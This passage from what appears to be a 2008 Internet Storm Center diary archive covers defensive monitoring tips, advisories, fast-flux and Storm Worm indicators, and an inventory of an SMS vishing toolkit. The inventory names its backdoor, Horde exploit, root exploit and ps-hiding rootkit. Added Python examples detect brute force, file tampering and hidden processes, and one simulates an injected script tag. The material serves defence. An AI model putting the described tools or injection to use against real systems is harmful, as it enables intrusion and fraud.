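        m = FAILED_RE.search(line)
        if m:
            rec = per_ip[m.group("ip")]
            rec["attempts"] += 1
            rec["users"].add(m.group("user"))
    return dict(per_ip)

def brute_force_sources(log_text, min_attempts=5, min_users=3):
    """Source addresses that both exceed the failure count and tried several
    distinct usernames: the dictionary-scan signature rather than a typo."""
    return sorted(
        ip for ip, rec in count_failures(log_text).items()
        if rec["attempts"] >= min_attempts and len(rec["users"]) >= min_users
    )

if __name__ == "__main__":
    for ip, rec in count_failures(SAMPLE_AUTH_LOG).items():
        print(ip, rec["attempts"], "failures,", len(rec["users"]), "usernames")
    print("brute force sources:", brute_force_sources(SAMPLE_AUTH_LOG))
```

On a real host, feed it the file with `count_failures(open("/var/log/auth.log").read())`; anything it flags is a candidate for the packet capture the diary asks for, and for the block-at-the-firewall reaction described elsewhere in this archive.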







Published: 2008-06-07

What's going on with these ports? Got packets?

One of the first things I normally do when I start a shift as HOD is to look at our trends page and see if there is anything interesting going on.  Today, I noted ports 8800, 1100, and 5905.  And what the heck is going on with the periodic spikes on 22105?  I see our friends at Arbor have posted a nice story about the port 1100 stuff and what they think that is all about, but if anyone has thoughts on any of these others and/or is able to capture some packets (something more than just SYN packets) let us know via the contact page.




Published: 2008-06-07

Followup to 'How do you monitor your website?'

On 28 May, I posted a story asking for your input.  Last weekend got busy, so I didn't post the results, but since I had another shift coming up, I figured I'd do it now.  I got quite a few responses (my apologies for the length of this diary), but many of them made good points, so I'm going to share them here mostly unedited.  So, without further ado....


  • The conversation that started it all from Steve began with this: "On one of the web-servers I help administrate, I use a script that scans each file in the WWW folder. The file takes a search pattern and scans the file to see if there is a match. If there is, then you will get an email displaying the location of the file and what triggered a match. I have used this script to clean out many PHP based shell scripts and was wondering if you know of anything I can add to the search string to give it more coverage.

    String currently used:
  • From Jason: "A WAF (Web Application Firewall).

    As an InfoSec admin, one of the big things I feel is missing in my arsenal is real-time access to the Web logs of any servers I'm meant to be protecting.

    WAFs are great (go modsecurity!) as they not only protect your sites from known attacks, but having access to the centralized logs (a WAF could protect dozens of servers) means you have the opportunity to post-process - looking for "odd" things - stuff that no filter can detect.

    NIDS can't do this job - they aren't meant to - and can't handle HTTPS anyway. "
  • From John: "From what I can tell the Proventia G/M device picks up most of all this garbage when tuned properly.  It will pick up the SQL injection attempts, it also picks up the cross site scripting from visiting compromised sites, and the transfer of the trojan if you happen to make it that far."
  • From David: "For the most part, I have a script I call "Adaptive Firewall".  It searches for "suspicious" activity in the log files.  When it finds an entry, it grabs the IP which is in turn fully blocked from the server at the firewall.  So an attack via one port will prevent further attacks even on other ports.

    It works great against SSH brute force attacks.  After seeing the first attempts, no additional attempts even touch the server.  Same for most (known) web scan attacks (looking for .dlls, .exes, etc).  Though there is the small time delay between detection and blocking."
  • From Florian: "I'm too lazy to keep tripwire rules maintained so I just use a little bash script via cron to check md5sum's of my site every 15 minutes.  Quick n dirty but it works, caught it when I forgot to update my google adsense wordpress plugin and got owned."
  • From Scott: "we have a simple script which runs every 30 seconds to monitor for changed content. if there's any unexpected content on there we find out pretty quickly."
  • From David: "I've been very happy with OSSEC (I guess part of the "etc" in the list from the blog posting).  I've found it helpful both in file integrity monitoring/new file alerting and in the immediate feedback it provides to oddities in the log files it monitors.  Combined with mod_sec, I get an early alert to anything odd going on.  But my website is pretty small and traffic light -- that might well become too much chatter on a larger, more trafficked site.

    In my former life, I wrote some monitoring scripts that, among other things, confirmed that our revenue generating links were always on our home page -- figuring they would be the first to be monkeyed with if we were hacked.  We looked for ports open that should not have been -- even though the firewall would block the traffic, we wanted to know if any new ports were opened.

    I imagine if I had a database driven site, with all the SQL injection attacks, I would be crawling the site and looking for odd things (maybe build a hash of links and look for any outside my domain that seemed to appear too many times; any src= tags outside my domain, and maybe any javascript or object src= tags that I didn't approve).  I'd also script some monitoring of the SQL log for things that shouldn't be there -- better still, anything that does not look like approved use."
  • From Mike: "As I do not have the time to diagnose issues I have fallen back to an old concept, I keep master copies of all sites on a local server and use an automation enabled FTP program to compare them on a schedule. If anything has changed the site is forced back to its original state. While this does wipe out any chance of reverse forensics it does serve the main purpose.. to protect your website visitors. And it works on any hosting server which provides FTP access without running any additional programs on the webserver!

    Not very fancy but quite effective."
  • From Andy: "Just a little note.  Aside from using the usual mysql_escape_string in php, all search strings used throughout the site are submitted to a second database with only one randomly named table in there, so no chance of dropping tables, no logging on tricks for it etc.

    I check this log every day just to see what people are doing, it records the IP timestamp and string entered."
  • From Alec: "We try to not use application logfiles (Apache, IIS, whatever) for security monitoring. If the host is indeed compromised, you can't trust the contents of the logfiles anyway - I have first hand experience of the traces of an IIS exploit being removed from the IIS logs by the exploit itself. The logs on the server's disk are corroborative evidence at best.

    To get a "true" picture of what is actually going on, we ship application logs off-box ASAP via Snare Epilog, allowing for differential analysis of the two sets of logs. We also use Sguil for full-content capture straight off the wire, and collect Netflow data.

    Any games of spot-the-SQL-injection can then be performed on what are hopefully unadulterated records of activity, and Netflow reporting can tell you if one of your servers has suddenly starting sourcing traffic itself (malware C&C channel etc.)."
  • To which fellow handler Swa adds "While in the windows world it doesn't come native, syslog is a great way to get logs from servers/services and/or applications off to a central (or better: 2 central) servers that can even be independently managed (so as to make sure they aren't going to be swept up together with another attack or even an insider job among your admins).

    In mixed environments I've seen good use of Kiwi:  http://www.kiwisyslog.com/"
  • From Joshua: "Nessus has the ability to mirror content from a website and check the contents for patterns. We do this anytime there is a new "big" insertion threat out there.

    I also check zone-h.org, xssed.org everyday to see if there are any reported defacements or xss vulnerabilities found within our domains.

    We have Google alerts setup with some common key words (viagra, cialis, casino, ...) used in insertion attacks."
  • From Mike: "PHPIDS
    Web Application Security 2.0
    PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application.  The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to
    decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user's session."
  • From Hector: "Right now, I'm using Nagios to check the integrity of the website pages and mod_security to log potential attacks. I'm going to try tripwire and AIDE."
  • From Barry: "CVS...(or similar)...regularly export the files out onto the website (you can diff them to give early warning of attacks or simply blat over the top) - only deals with source not database contents so doesn't handle drive-by SQL injection...still, no reason not to script up automated queries to search the database contents for badness...e.g. if your database content shouldn't have absolute URLS, what are they doing in there?"
  • From Janantha: "I think the best thing is to have custom script that does the following. I'm thinking we can make the monitoring better using "Integrity" => hashing

    -Prior to uploading the finalized version to the web server, tar the whole directory and hash it.

    -Create a crontab to regularly (every 2 mins or so) tar and hash the home directory and save the hash in a location outside /var/www/ (non-public) location. It could compare the current hash with the previous one. As soon as it detects a change it alerts the administrator.

    Condition should be that the webmaster should have the latest hash for every major update made to that directory. And has a "Clean" backup in hand to restore if something has happened."
  • From MysteryFCM: "I use a program I wrote called hpObserver, that notifies me of downtime, and changes to any of the pages ....

    I also periodically go through the server logs to check for attempted exploits etc - tis all good fun!"

So there you have it.  My thanks to everyone who took the time to write in.  On my personal server, I use aide, SEC (Simple Event Correlator) for near realtime log monitoring, OSSEC, mod_security, and some home grown scripts, but mine is basically static anyway, so it is probably overkill.
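Several of the replies above (Florian's md5sum cron job, Scott's 30-second change check, Janantha's tar-and-hash scheme, Hector's Nagios page checks) boil down to the same idea: hash what you published, re-hash on a schedule, alert on any difference. The following Python is an added example of my own and not any reader's script. It baselines every file under a web root with SHA-256 rather than md5sum (MD5 is no longer considered collision resistant), stores the baseline outside the web root as Janantha suggests, and reports added, removed and modified files. The sample tree and the simulated defacement in demo() are constructed.

```python
import hashlib
import json
import os
import tempfile

def hash_tree(root):
    """Map each regular file under root (path relative to root) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests

def save_baseline(digests, path):
    """Write the baseline; keep path outside the web root (for example under
    /var/lib) so a defacement cannot also rewrite the reference hashes."""
    with open(path, "w") as f:
        json.dump(digests, f, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path) as f:
        return json.load(f)

def diff_tree(baseline, current):
    """Return added, removed and modified relative paths as sorted lists."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}

def demo():
    """Constructed web root: take a baseline, then simulate what a mass
    injection leaves behind (a script tag appended to a page, a new file
    dropped in, a file deleted) and report the differences."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = os.path.join(tmp, "www")
        os.makedirs(os.path.join(webroot, "img"))
        with open(os.path.join(webroot, "index.html"), "w") as f:
            f.write("<html><body>hello</body></html>\n")
        with open(os.path.join(webroot, "img", "logo.txt"), "w") as f:
            f.write("logo placeholder\n")
        baseline_path = os.path.join(tmp, "baseline.json")   # outside webroot
        save_baseline(hash_tree(webroot), baseline_path)

        with open(os.path.join(webroot, "index.html"), "a") as f:
            f.write('<script src="http://example.invalid/b.js"></script>\n')
        with open(os.path.join(webroot, "upload.php"), "w") as f:
            f.write("<?php /* constructed placeholder for a dropped file */ ?>\n")
        os.remove(os.path.join(webroot, "img", "logo.txt"))

        return diff_tree(load_baseline(baseline_path), hash_tree(webroot))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run from cron every few minutes as Florian and Scott do, a non-empty result is the alert; after a legitimate deploy, regenerate the baseline (Janantha's point about keeping the latest hash for every major update) or the monitor will keep paging you.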


Published: 2008-06-06

Amazon.com Issues

We're getting a lot of reports that amazon.com is returning: Http/1.1 Service Unavailable

So far we have no information that this is a security incident or a major infrastructure issue.




Published: 2008-06-06

Microsoft Security Bulletin Advance Notification for June 2008

Microsoft released the advance notification for next week's Security Bulletin release.

The original announcement is available here: www.microsoft.com/technet/security/bulletin/ms08-Jun.mspx

The Microsoft Security Response Center (MSRC) has released their own blog announcement here: blogs.technet.com/msrc/archive/2008/06/05/june-2008-advance-notification.aspx

A quick review:

3 Critical

  • Bluetooth
  • Internet Explorer
  • DirectX

3 Important

  • WINS
  • Active Directory
  • PGM

1 Moderate

  • Kill Bits

I find the Bluetooth vulnerability to be the most interesting.




Published: 2008-06-05

Elevator pitch for explaining security risks to executives

How to catch the attention of a busy executive, to highlight an important security risk? An elevator pitch is a persuasive statement delivered verbally in the time you would share with the listener in an elevator--about 60 seconds. It is often used by entrepreneurs to convince a potential investor to learn more about the start-up. We can use an elevator pitch to highlight the importance of a security risk to a business or IT executive.

If you've never given or heard a traditional elevator pitch, take a look at the Elevator Pitches website at TechCrunch, which presents many videos from hopeful entrepreneurs. (Consider pitches for SmugMug, Ugobe, Framr.) You may notice that those pitches that catch your attention have a few characteristics in common:

  • They are brief. The listener has a limited attention span.
  • They are specific. The issues they bring up are easy to understand and visualize.
  • They differentiate. The speaker clarifies what makes his issue different from the rest.
  • They empathize with the listener. The listener needs to know why he should care.
  • They have a clear ending point. The speaker clarifies at the end what he wants the listener to do.

Let's say you are concerned about a security risk no one is paying attention to. Maybe it's a web server everyone is afraid to patch. Maybe it's the practice of allowing visitors to plug into your LAN. Use an elevator pitch to convince management to pay attention and support you.

Here are my hypothetical examples that may inspire you to explain your security risks. Remember: be brief and specific, differentiate the concern from other similar issues, clarify why the executive should care, and state what you want.

Example 1: "Our extranet website is missing dozens of critical security updates. The site could crash or become infected at any minute, and it may take us weeks to recover. This will prevent us from communicating with our supply chain partners, and will lead to thousands in losses. The challenge is that the app running on the server was written years ago by people who left the company, so everyone is afraid to touch the server. Yet, if we do nothing, we're sitting on a ticking time bomb. I need your help to get the right people together so we can make a decision. Could I invite you to a 30-minute meeting I'm organizing for tomorrow?"

Example 2: "Have you noticed that every vendor who visits us plugs into our LAN as soon as they unpack their laptop? If their system has a virus, the infection will likely spread to our internal systems. This is a significant threat we have not considered, as our patching practices rely heavily on the effectiveness of our network perimeter. As a result, our internal servers could get compromised, severely disrupting operations. I evaluated a few products that would let us control who can plug into the LAN. Could we speak next Monday about this issue--I think I have a solution you might like, but I need your feedback before continuing with the project."

An important point to consider with elevator pitches: Their aim is not to explain everything you want to say about the issue. Instead, the goal is to catch the listener's attention, so he would give you the additional time needed to explore the issue more carefully. Also, remember that preparation is critical, because you only have a minute to deliver your pitch. Don't memorize your statement, because then it may sound fake and rehearsed, but definitely consider what you will say before approaching the executive.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.


Published: 2008-06-05

Investigating fraudulent email and another Nigerian scam twist

"THOSE PEOPLE YOU ARE DEALING WITH ARE FAKE." So starts the Nigerian-style scam email submitted to us by Daniel Sefton. In such schemes, the sender attempts to swindle the recipient out of money, often by convincing the victim to pay some fee to transfer a prize, an inheritance sum, or money from another unexpected source.

Contents of the Fraudulent Email

The message we received offers an interesting twist on the scam by warning the recipient to be careful when receiving such messages. The email claims to come from Susan Walter, a US citizen living in Texas. "Susan" writes, "I am one of those that executed a contract in Nigeria years ago and they refused to pay me, I had paid over $70,000 trying to get my payment all to no avail."

The message explains how "Susan" traveled to Nigeria in an attempt to collect the funds owed to her. There, she met with Barr. Mat Oto, a "member of CONTRACT AWARD COMMITTEE." He then "took me to the paying bank, which is Zenith Bank, and I am the happiest woman on this earth because I have received my contract funds of $4.2Million USD."

"Susan" also explains that she saw documents that listed the recipient of her email as a victim of such a fraud. She advises the recipient to contact Barr. Mat Oto via the supplied contact details. This will allow the recipient to retrieve the money that might be owed to him or her, at the mere cost of $1,200 payable to the Internal Revenue Service (IRS).

A web search revealed that such messages began circulating in late April, 2008. The April message I encountered specified a different name for the helpful Nigerian official, "Barrister Afam Richardson Esq," and used the subject "Your happiness is my concern." A message sent in May used "Susan Walter" as the sender. One specified the amount paid to the IRS as $980; another as $1,200.

Investigating Fraudulent Messages

If you receive a suspicious message, consider searching for its elements on urgentmessage.org. This website archives and indexes spam messages of fraudulent nature. The most interesting feature of the site is the correlation it performs across contact details specified in the messages, such as names, email addresses, and phone numbers. This helps you find related messages to understand the scope and history of the scam.

Consider the diagram the website generated for "Susan's" message described above:

The diagram on the website is clickable. Clicking on "Susan's" email address brought me to a page that showed a related message and additional elements worth investigating:

Very handy!

Do you have your favorite tools or websites for investigating fraudulent emails? Let us know, and we'll share your tips with our readers.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.



Published: 2008-06-04

5 New Cisco Vulnerabilities for PIX and ASA

Cisco has released details on 5 vulnerabilities with their PIX and ASA product lines.  In short, the quick bullet list of vulnerabilities is:

  • Crafted TCP ACK Packet Vulnerability (Denial of Service)
  • Crafted TLS Packet Vulnerability (Denial of Service)
  • Instant Messenger Inspection Vulnerability (Denial of Service)
  • Vulnerability Scan Denial of Service (Denial of Service)
  • Control-plane Access Control List Vulnerability (Bypass ACL)

Updates are available to fix all of the above and there are no workarounds for the final four of these.  In short, update your devices.  Good news is that these were internal finds and it doesn't appear there is exploitation or "public" knowledge of the vulnerability details to create exploits.

John Bambenek / bambenek \at\ gmail |dot| com



Published: 2008-06-03

Level 3 outage in St. Louis

Thanks to Gary for sending this in!

According to Internetpulse.net, it appears as if Level 3 is having a bit of an outage in St. Louis this morning.  We'll keep our eye on it, but if you have any information, please feel free to write in at the "Contact" link at the top of the page.


Joel Esler




Published: 2008-06-02

New sql injection site with fastflux hosting

One of our frequent contributors notified us of a new SQL injection site.
hxxp://en-us18.com/b.js is being injected into websites via SQL injection.

When I googled for it I saw 560 injected webpages.
“b.js injects an iFrame which points to
which in turn embeds two Flash files:


This appears to be fast fluxed, or at least set up to change rapidly, based on this dig output.

dig www.en-us18.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 1
;;      www.en-us18.com, type = A, class = IN
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A

www.en-us18.com.        10M IN A
en-us18.com.            1d18h57m52s IN NS  ns3.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns2.en-us18.com.

en-us18.com.            1d18h57m52s IN NS  ns4.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns1.en-us18.com.
ns1.en-us18.com.        1d21h10m38s IN A 

A second dig a few minutes later produced similar but slightly different results.
So this domain is changing. I guess they got tired of people blackholing their IP addresses.
In that case I would recommend you DNS-blackhole the domain itself.
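As an added example (my code, not the contributor's), here is Python that parses the answer section of dig output like the one above and scores the fast-flux indicators a defender looks for: many A records, each with a short TTL, spread over unrelated networks, and an answer set that changes between two queries a few minutes apart. The dig text is constructed with RFC 5737 documentation addresses because the diary does not reproduce the real ones, and the thresholds are assumptions to tune.

```python
import re

# Constructed dig output modelled on the diary's query. Addresses are from the
# RFC 5737 documentation ranges, not the real ones (which the diary omits).
SAMPLE_DIG = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 2, ADDITIONAL: 1
www.example.invalid.     10M IN A 192.0.2.11
www.example.invalid.     10M IN A 198.51.100.23
www.example.invalid.     10M IN A 203.0.113.45
www.example.invalid.     10M IN A 192.0.2.200
www.example.invalid.     10M IN A 198.51.100.77
www.example.invalid.     10M IN A 203.0.113.9
example.invalid.         1d18h57m52s IN NS ns1.example.invalid.
example.invalid.         1d18h57m52s IN NS ns2.example.invalid.
"""

# A second constructed answer "a few minutes later": two addresses rotated out.
SAMPLE_DIG_LATER = """\
www.example.invalid.     10M IN A 192.0.2.11
www.example.invalid.     10M IN A 198.51.100.23
www.example.invalid.     10M IN A 203.0.113.45
www.example.invalid.     10M IN A 192.0.2.200
www.example.invalid.     10M IN A 198.51.100.140
www.example.invalid.     10M IN A 203.0.113.250
"""

A_RECORD_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\S+)\s+IN\s+A\s+(?P<ip>\d+\.\d+\.\d+\.\d+)$")

_UNITS = {"w": 604800, "d": 86400, "h": 3600, "m": 60, "s": 1}

def ttl_to_seconds(ttl):
    """Parse TTLs as printed by older dig ('10M', '1d18h57m52s') or as plain seconds."""
    if ttl.isdigit():
        return int(ttl)
    total = 0
    for value, unit in re.findall(r"(\d+)([wdhmsWDHMS])", ttl):
        total += int(value) * _UNITS[unit.lower()]
    return total

def parse_a_records(dig_text):
    """Return (name, ttl_seconds, ip) for every A record in a dig answer."""
    out = []
    for line in dig_text.splitlines():
        m = A_RECORD_RE.match(line.strip())
        if m:
            out.append((m.group("name"), ttl_to_seconds(m.group("ttl")), m.group("ip")))
    return out

def slash16(ip):
    """Coarse network key: the first two octets."""
    return ".".join(ip.split(".")[:2])

def fast_flux_indicators(dig_text, max_ttl=600, min_addrs=5, min_nets=3):
    """Score one answer: many A records, all with short TTLs, spread across
    several /16s is the classic fast-flux profile (thresholds are assumptions)."""
    recs = parse_a_records(dig_text)
    ips = {ip for _n, _t, ip in recs}
    ttls = {ttl for _n, ttl, _ip in recs}
    nets = {slash16(ip) for ip in ips}
    return {
        "addresses": len(ips),
        "max_ttl": max(ttls) if ttls else None,
        "distinct_slash16": len(nets),
        "suspicious": (len(ips) >= min_addrs and bool(ttls)
                       and max(ttls) <= max_ttl and len(nets) >= min_nets),
    }

def diff_answers(first, second):
    """Addresses that appeared or vanished between two successive queries;
    churn with short TTLs is what the diary observed minutes apart."""
    a = {ip for _n, _t, ip in parse_a_records(first)}
    b = {ip for _n, _t, ip in parse_a_records(second)}
    return {"added": sorted(b - a), "dropped": sorted(a - b)}

if __name__ == "__main__":
    print(fast_flux_indicators(SAMPLE_DIG))
    print(diff_answers(SAMPLE_DIG, SAMPLE_DIG_LATER))
```

Because the hosting churns, this is also the argument for blocking the domain name rather than the addresses, as the diary recommends: a blackhole zone on your resolver keeps working no matter how often the A records rotate.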


Published: 2008-06-02

New Stormworm download site

DavidF brought a new stormworm download site to our attention. is being spammed out with a message that states:

Crazy in love with you” hxxp://

I checked that site and could only find an index.html, lr.gif and loveyou.exe. lr.gif is a gif file that says “love riddles”.
Index.html encourages visitors to run loveyou.exe by asking ‘Who is loving you? Do you want to know? Just click here and choose either “Open” or “Run”’. loveyou.exe is a version of Trojan.Peacom.D aka  Stormworm.

I recommend you block this IP address until it gets cleaned up.


Published: 2008-06-02

A little vulnerable 'flash from the past' a la MS-XP-SP3

It appears that XP Service Pack 3 installs an older, vulnerable version of the Flash player,
causing those systems to be exposed to these vulnerabilities.

Microsoft has documented it here:

"Why was this Bulletin revised on May 13, 2008?
This bulletin was revised to add Windows XP Service Pack 3 as affected software.
This is a detection update only. There were no changes to the binaries, since
the same update for Windows XP Service Pack 2 and Windows XP Professional x64
Edition applies to Windows XP Service Pack 3. Customers with Windows XP Service
Pack 2 and Windows XP Professional x64 Edition who have already installed the security
update will not need to reinstall the update. Customers with Windows XP Service Pack 3
should apply the update immediately."



Published: 2008-06-02

Emergingthreats.net and ThePlanet

You know what they say about the best laid plans...  Several of our readers have written in today saying they couldn't reach emergingthreats.net.  I just talked to Matt Jonkman and he tells me that they expect to be live again shortly (maybe even by the time  you read this).  It turns out they have 2 servers that used to be in 2 different datacenters until ThePlanet bought ev1 and moved their other server into that same datacenter in Houston where their first server was located.  You know, the one that had the big fire (see http://isc.sans.org/diary.html?storyid=4504).


Published: 2008-06-02

sms-vishing for your bank info

I have recently become aware of, and involved in researching, SMS vishing attacks. As part of that research I came across an automated toolkit that appears to have been cobbled together for SMS spamming and vishing (phishing using voice networks instead of data networks). The name of the main tool was SmssmtpSender.

SmssmtpSender consisted of several individual tools cobbled together into a single toolkit to compromise, manage and control a set of systems for sending SMS spam via compromised POP accounts that had weak passwords. Here is a "short" analysis of the elements of that toolkit.


Each entry below gives the path, the file type as reported, and a description.

  • Top-level directory.
  • /greetingisland.gsm, data: greeting message used to vish customers; this version was for North Island Credit Union. Contents of the welcome message: "Welcome to North Island Credit Union Financial department. Please follow the next steps to renew your payments and transfer services"
  • /hello.wav, RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz: greeting message used to vish customers for North Island Credit Union. Contents of the welcome message: "Welcome to North Island Credit Union Financial department. Please follow the next steps to renew your payments and transfer services"
  • /horde, directory: top-level directory for the horde remote compromise tool.
  • /horde/.dc, perl script text: "Data Cha0s Connect Back Backdoor". This could be used as a backdoor control channel; however, on the systems analyzed, ssh on a high-numbered port was used for management instead.
  • ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), for GNU/Linux 2.2.5, stripped.
    From the man page: "gwee (generic web exploitation engine) is a small program written in C designed to exploit arbitrary command execution vulnerabilities in web scripts, such as Perl, CGIs, PHP, etc. gwee is much like an exploit, except more general purpose."
    This appears to have been tested for remote web-based shell access using .dc above. The systems that I am aware of were compromised via the horde.pl script, not gwee with .dc.
  • /horde/gwee-1.36, directory: top-level directory for gwee.
  • /horde/gwee-1.36/binaries, directory: directory for binaries created in the compile of gwee.
  • /horde/gwee-1.36/binaries/gwee.exe, PE executable for MS Windows (console) Intel 80386 32-bit: gwee executable for Windows.
  • /horde/gwee-1.36/gwee, ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped: gwee executable for Linux on Intel, kernel >= 2.2.5.
  • /horde/gwee-1.36/gwee.1, troff or preprocessor input text: man page for gwee.
  • /horde/gwee-1.36/gwee.c, ASCII C program text, with very long lines: gwee source code.
  • /horde/gwee-1.36/Makefile, ASCII text: gwee makefile.
  • /horde/gwee-1.36/mktarball.sh, Bourne shell script text executable: script to create a tarball for gwee.
  • /horde/gwee-1.36/README, ASCII English text: installation notes for gwee.
  • /horde/gwee-1.36.tar.gz, gzip compressed data, from Unix: gzipped tarball of gwee.
  • /horde/horddy.pl, perl script text executable: Horde help module remote execution perl exploit. This was used to compromise Horde hosts for use as the smtp -> sms senders.
  • /horde/root.txt, Bourne shell script text executable: "PRCTL local root exp By Sunix effected systems 2.6.13<= x <= + 2.6.9-22.Elsmp". A local privilege escalation root exploit for Linux kernels 2.6.13-2.6.17. The horde.pl exploit often would not provide direct root access, so a privilege escalation tool was included in this toolkit.
  • /horde/try, Bourne shell script text executable: script with gwee parameters used to exploit remote systems. It appears to use .dc for a remote shell.
  • /horde/try.bak, Bourne shell script text executable: script with gwee parameters used to exploit remote systems. It appears to use .dc for a remote shell. Appears to be used after horddy.pl to check for success of the remote exploit, to see if the backdoor port was opened.
  • /hordetry.tgz, gzip compressed data, from Unix: gzipped tarball of the horde tool.
  • /netstatx.c, ASCII C program text, with escape sequences: "ps.c,v 1.11 2001/09/03", a trojaned ps replacement style rootkit. Wraps ps, filtering the output via egrep -v for the set of hidden words. Any word in the hidden word set is removed from the ps output, effectively hiding any process in the "hidden word" set on a compromised system. Hidden words are stored in /usr/lib/.lib/libps or libph.
  • /popprober, directory: top-level directory for the popprober tool.
  • /popprober/checked.txt, ASCII text: file with accounts that have been tested.
  • /popprober/copy.txt, ASCII text: list of accounts with status such as "Unread". Appears to be a list of active but unused accounts. These are post-processed via probe.pl.
  • /popprober/message.txt, ASCII text: probe.pl looks for this message to validate that the account is still unused.
  • /popprober/popvuln.txt, ASCII text: list of vulnerable POP accounts with account, password, IP address of the POP/SMTP server and type of login {LOGIN|CRAM-MD5}.
  • /popprober/probe.pl, perl script text executable: tool used to post-process copy.txt for unread/unmonitored accounts.
  • /popprober/smtp-client.pl, perl script text executable: simple SMTP client with STARTTLS and AUTH support. Tool used to send the SMTP commands.
  • /popprober/Test.pl, perl script text executable: "Meca smtp Test v1.0", a wrapper for smtp-client.pl to send to accounts listed in popvuln.txt.
  • /smssmtpsender, directory: the SMS-over-SMTP sending tool's main directory.
  • /smssmtpsender/message.txt, ASCII text: spam text to be sent via SMTP to an SMTP->SMS gateway. This is the actual message being sent to SMS-enabled devices.
  • /smssmtpsender/poplist.txt, ASCII text: list of accounts to use when sending SMTP messages. Same format as popvuln.txt.
  • /smssmtpsender/send.pl, perl script text executable: "Meca smtp sender v1.0". Used to send SMTP spam messages.
  • /smssmtpsender/smtp-engine.pl, perl script text executable: another perl script that can be used to send the SMTP commands plus spam messages. This one spoofs Outlook by using an X-Mailer value of "Microsoft Outlook Express 6.00.2600.0000".
  • /smssmtpsender.tgz, gzip compressed data, from Unix: gzipped tarball of the smssmtpsender toolkit.
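Since the netstatx.c wrapper hides processes only by filtering what ps prints, the kernel's own process list still shows them. Below is an added Python example (not part of the toolkit or of the diary) of the cross-view check a responder can run on a host suspected of carrying such a wrapper: compare the PIDs the kernel exposes under /proc with the PIDs a possibly trojaned ps reports, and flag the difference. demo() uses constructed PID sets; live_check() runs the comparison on a Linux host, snapshotting /proc before and after ps so short-lived processes do not produce false alarms.

```python
import os
import subprocess

def pids_from_proc():
    """Kernel's view: every numeric directory name in /proc is a live process."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}

def pids_from_ps_output(ps_text):
    """Userland view: PIDs as printed by `ps -e -o pid=` (one number per line)."""
    return {int(tok) for tok in ps_text.split() if tok.isdigit()}

def hidden_pids(kernel_view, ps_view):
    """PIDs the kernel knows about but the ps binary did not print.
    A non-empty, repeatable result is the signature of a ps wrapper that
    drops lines matching a hidden-word list, as netstatx.c does."""
    return sorted(kernel_view - ps_view)

def demo():
    """Constructed example: the kernel sees five processes, the (trojaned) ps
    output omits one of them."""
    constructed_proc = {1, 2, 400, 401, 4242}
    constructed_ps = "   1\n   2\n 400\n 401\n"        # PID 4242 filtered out
    return hidden_pids(constructed_proc, pids_from_ps_output(constructed_ps))

def live_check():
    """Run the comparison on this host (Linux only; returns None elsewhere).
    Only PIDs present in /proc both before and after ps ran are considered,
    so processes that started or exited in between are ignored."""
    if not os.path.isdir("/proc"):
        return None
    before = pids_from_proc()
    ps_out = subprocess.run(["ps", "-e", "-o", "pid="],
                            capture_output=True, text=True).stdout
    after = pids_from_proc()
    return hidden_pids(before & after, pids_from_ps_output(ps_out))

if __name__ == "__main__":
    print("constructed demo, hidden PIDs:", demo())
    result = live_check()
    if result is not None:
        print("this host, hidden PIDs:", result)
```

A wrapper that also edits /proc is a different class of problem (kernel-level), which is why the /proc view is compared with ps rather than trusted outright; if the result is non-empty, pull the binary for analysis from a known-good toolkit rather than the host's own tools.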



Published: 2008-06-01

The Planet outage - what can we all learn from it?

The Planet, a popular hosting provider, had a fire and explosion earlier this weekend, resulting in an outage of their H1 data center.

Reading through the announcements and the usual techno-press reports on it, a few things struck me. While the last word on this is far from said, I saw a few striking things from a BCP/DRP viewpoint:

  • First I'd like to mention that I'm actually impressed by the frequent communication and the calmness of those messages from The Planet: http://forums.theplanet.com/index.php?showtopic=90185.
    I think it's important to teach those dealing with (major) incidents to remain calm. Not just when dealing with the public or the press, but also internally. Think through your decisions before you act, as doing things in a panic will result in making the wrong choices.
    Also, communicating the right way can be critical; planning ahead helps a lot.
